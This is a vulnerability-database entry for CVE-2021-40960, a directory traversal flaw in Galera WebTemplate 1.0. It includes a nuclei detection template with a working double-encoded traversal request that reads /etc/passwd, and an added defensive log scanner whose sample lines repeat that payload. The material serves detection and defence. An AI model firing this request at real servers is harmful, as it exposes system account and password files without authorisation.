Galera WebTemplate 1.0 Directory Traversal

03 Jul 2026 03:01:05 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

Galera WebTemplate 1.0 is affected by a directory traversal vulnerability (CVE-2021-40960) that can disclose /etc/passwd and /etc/shadow, leading to unauthorized access, data leakage, or system compromise. Apply vendor-provided updates to fix the vulnerability.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| ATTACKERKB | CVE-2021-40960 | 1 Oct 2021 14:15 | attackerkb |
| Circl | CVE-2021-40960 | 1 Oct 2021 18:15 | circl |
| CNNVD | Galera WebTemplate Path Traversal Vulnerability | 1 Oct 2021 00:00 | cnnvd |
| CVE | CVE-2021-40960 | 1 Oct 2021 13:12 | cve |
| Cvelist | CVE-2021-40960 | 1 Oct 2021 13:12 | cvelist |
| NVD | CVE-2021-40960 | 1 Oct 2021 14:15 | nvd |
| OpenVAS | Generic HTTP Directory Traversal / File Inclusion (Web Dirs) - Active Check | 22 Jul 2021 00:00 | openvas |
| OSV | CVE-2021-40960 | 1 Oct 2021 14:15 | osv |
| Prion | Directory traversal | 1 Oct 2021 14:15 | prion |

id: CVE-2021-40960

info:
  name: Galera WebTemplate 1.0 Directory Traversal
  author: daffainfo
  severity: critical
  description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.
  impact: |
    An attacker can read, modify, or delete sensitive files on the server, potentially leading to unauthorized access, data leakage, or system compromise.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Galera WebTemplate 1.0.
  reference:
    - http://www.omrylmz.com/galera-webtemplate-1-0-directory-traversal-vulnerability-cve-2021-40960/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40960
    - http://www.galera.com.tr/
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-40960
    cwe-id: CWE-22
    epss-score: 0.09768
    epss-percentile: 0.94951
    cpe: cpe:2.3:a:galera:galera_webtemplate:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: galera
    product: galera_webtemplate
  tags: cve2021,cve,lfi,galera,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022006326effb653a5555695ee562b9634a802747e3ee265379682cfa64ab9e85ea2022004591eecb1ac4706c86bc4020729b1878f174c8864ab73e47bab27fc86b1d821:922c64590222798bb761d5b6d8e72950
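
A defender-side check for the request pattern in the template above, as an added example that is not part of the template or the original page: it peels nested percent-encoding from logged request paths and flags any that resolve to a `..` segment. The combined access-log format, the sample log lines, and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD|PUT|DELETE|OPTIONS) (\S+) HTTP/[\d.]+" (\d{3})')
MAX_ROUNDS = 5  # upper bound on nested percent-encoding layers to peel

def decode_layers(path):
    """Percent-decode until the value stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds

def has_traversal(path):
    """True if any segment of the fully decoded path (query stripped) is '..'."""
    decoded, _ = decode_layers(path.split("?", 1)[0])
    return ".." in re.split(r"[/\\]+", decoded)

def scan(lines):
    """Return (path, status, encoding_layers) for each request with a '..' segment."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path, status = m.group(1), int(m.group(2))
        if has_traversal(path):
            hits.append((path, status, decode_layers(path)[1]))
    return hits

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Oct/2021:14:15:00 +0000] "GET /GallerySite/filesrc/fotoilan/388/middle/photo.jpg HTTP/1.1" 200 5120',
    '192.0.2.77 - - [01/Oct/2021:14:16:02 +0000] "GET /GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1" 200 1843',
    '192.0.2.10 - - [01/Oct/2021:14:17:40 +0000] "GET /GallerySite/docs/v1.0..final.pdf HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for path, status, layers in scan(SAMPLE_LOG):
        print(f"traversal status={status} layers={layers} path={path}")
```

A flagged request that returned status 200 is the case to triage first, since the template only reports a match when the response is 200 and the body matches `root:.*:0:0:`.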

04 Feb 2026 07:00 (current)
Vulners AI Score: 7.2 (High risk)
CVSS 2: 7.5
CVSS 3.1: 9.8
EPSS: 0.09768